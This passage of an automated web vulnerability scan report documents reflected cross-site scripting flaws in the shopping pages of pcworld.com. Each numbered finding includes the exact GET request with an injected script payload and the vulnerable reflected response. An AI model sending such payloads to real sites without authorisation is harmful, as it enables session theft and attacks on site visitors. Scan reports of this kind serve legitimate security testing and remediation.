User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:25:06 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=0738FB2E56DEDC80FCA9CE1553B3E8BB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:25:05 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<a href='/shopping/browse/category.html?id=10061&filter=popup5[],1:27397d02'style='x:expression(alert(1))'e85fc47a3a8|vendors[],PG3M' rel="nofollow" >
...[SNIP]...

1.171. http://www.pcworld.com/shopping/browse/category.html [filter parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The value of the filter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05dd"><img%20src%3da%20onerror%3dalert(1)>ec11cf46628 was submitted in the filter parameter. This input was echoed as f05dd"><img src=a onerror=alert(1)>ec11cf46628 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /shopping/browse/category.html?id=10061&filter=popup5[],1:273f05dd"><img%20src%3da%20onerror%3dalert(1)>ec11cf46628 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:23:57 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:23:57 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/browse/category.html?id=10061&filter=|popup5[],1:273f05dd"><img src=a onerror=alert(1)>ec11cf46628"/>
...[SNIP]...

1.172. http://www.pcworld.com/shopping/browse/category.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 829be"><script>alert(1)</script>3aa4dd0ad48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/browse/category.html?id=10010&829be"><script>alert(1)</script>3aa4dd0ad48=1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:37 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/browse/category.html?id=10010&829be"><script>alert(1)</script>3aa4dd0ad48=1"/>
...[SNIP]...

1.173. http://www.pcworld.com/shopping/browse/category.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/browse/category.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb273"-alert(1)-"5ad24fe7461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/browse/category.html?id=10010&eb273"-alert(1)-"5ad24fe7461=1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:20:51 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=8E08AE9A995C8DDD74810F8DA17180C3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:20:51 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<script>
                   function sortBy (val) {
                       if (val != "") {val = "&sortby="+val;}
                       
                           
                                                           location.href= "/shopping/browse/category.html?id=10010&eb273"-alert(1)-"5ad24fe7461=1"+val;
                           
                       
                   }
               </script>
...[SNIP]...

1.174. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 584cd'-alert(1)-'6c29b9ca6f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping584cd'-alert(1)-'6c29b9ca6f2/detail/prtprdid,740315697-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:15 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=735CA7E2BC28783BE49167CA69687990; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:14 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping584cd'-alert(1)-'6c29b9ca6f2/detail/prtprdid,740315697-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer +=
...[SNIP]...

1.175. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcfa3'-alert(1)-'55ecde0f8db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detailbcfa3'-alert(1)-'55ecde0f8db/prtprdid,740315697-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:34 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=64F1C5F3B00B94A85DE199C258EA9E2F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:33 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detailbcfa3'-alert(1)-'55ecde0f8db/prtprdid,740315697-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remembe
...[SNIP]...

1.176. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64292"><script>alert(1)</script>a6c61993565 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail64292"><script>alert(1)</script>a6c61993565/prtprdid,740315697-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:33 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:33 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail64292"><script>alert(1)</script>a6c61993565/prtprdid,740315697-sortby,retailer/pricing.html"/>
...[SNIP]...

1.177. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4aa1"><script>alert(1)</script>92871698a42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail/prtprdid,740315697-sortby,retailera4aa1"><script>alert(1)</script>92871698a42/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:35 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=FF462C11A975C21D66ECB3E9CEE89018; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail/prtprdid,740315697-sortby,retailera4aa1"><script>alert(1)</script>92871698a42/pricing.html"/>
...[SNIP]...

1.178. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c79d0'-alert(1)-'9da77505ad9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail/prtprdid,740315697-sortby,retailerc79d0'-alert(1)-'9da77505ad9/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:18:37 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:37 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,740315697-sortby,retailerc79d0'-alert(1)-'9da77505ad9/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.179. http://www.pcworld.com/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,740315697-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c62a6'-alert(1)-'d3ccecd77f6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail/prtprdid,740315697-sortby,retailer/pricing.htmlc62a6'-alert(1)-'d3ccecd77f6 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A85E1D616EC18C568D9ADF48721C5D9A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:18:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,740315697-sortby,retailer/pricing.htmlc62a6'-alert(1)-'d3ccecd77f6';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.180. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f12d5'-alert(1)-'a562ff186f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shoppingf12d5'-alert(1)-'a562ff186f9/detail/prtprdid,794972128-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:28 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:28 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shoppingf12d5'-alert(1)-'a562ff186f9/detail/prtprdid,794972128-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer +=
...[SNIP]...

1.181. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd2a5'-alert(1)-'2a25249ec4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detailcd2a5'-alert(1)-'2a25249ec4f/prtprdid,794972128-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:31 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:31 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detailcd2a5'-alert(1)-'2a25249ec4f/prtprdid,794972128-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remembe
...[SNIP]...

1.182. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51f0"><script>alert(1)</script>0377da4d2c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detailb51f0"><script>alert(1)</script>0377da4d2c7/prtprdid,794972128-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:30 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:30 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detailb51f0"><script>alert(1)</script>0377da4d2c7/prtprdid,794972128-sortby,retailer/pricing.html"/>
...[SNIP]...

1.183. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59e4e"><script>alert(1)</script>42ea55a2e5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail/prtprdid,794972128-sortby,retailer59e4e"><script>alert(1)</script>42ea55a2e5b/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:33 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:32 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail/prtprdid,794972128-sortby,retailer59e4e"><script>alert(1)</script>42ea55a2e5b/pricing.html"/>
...[SNIP]...

1.184. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4175'-alert(1)-'3517add9f14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail/prtprdid,794972128-sortby,retailerf4175'-alert(1)-'3517add9f14/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:35 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2C873B61048637FD2DE22348CB3DAACB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,794972128-sortby,retailerf4175'-alert(1)-'3517add9f14/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.185. http://www.pcworld.com/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 431cc'-alert(1)-'80d93c4b0e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html431cc'-alert(1)-'80d93c4b0e1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:19:37 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,794972128-sortby,retailer/pricing.html431cc'-alert(1)-'80d93c4b0e1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.186. http://www.pcworld.com/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39d16'-alert(1)-'1ced90403a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping39d16'-alert(1)-'1ced90403a4/detail/prtprdid,801749642-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:19:58 GMT
Cache-Control: max-age=60
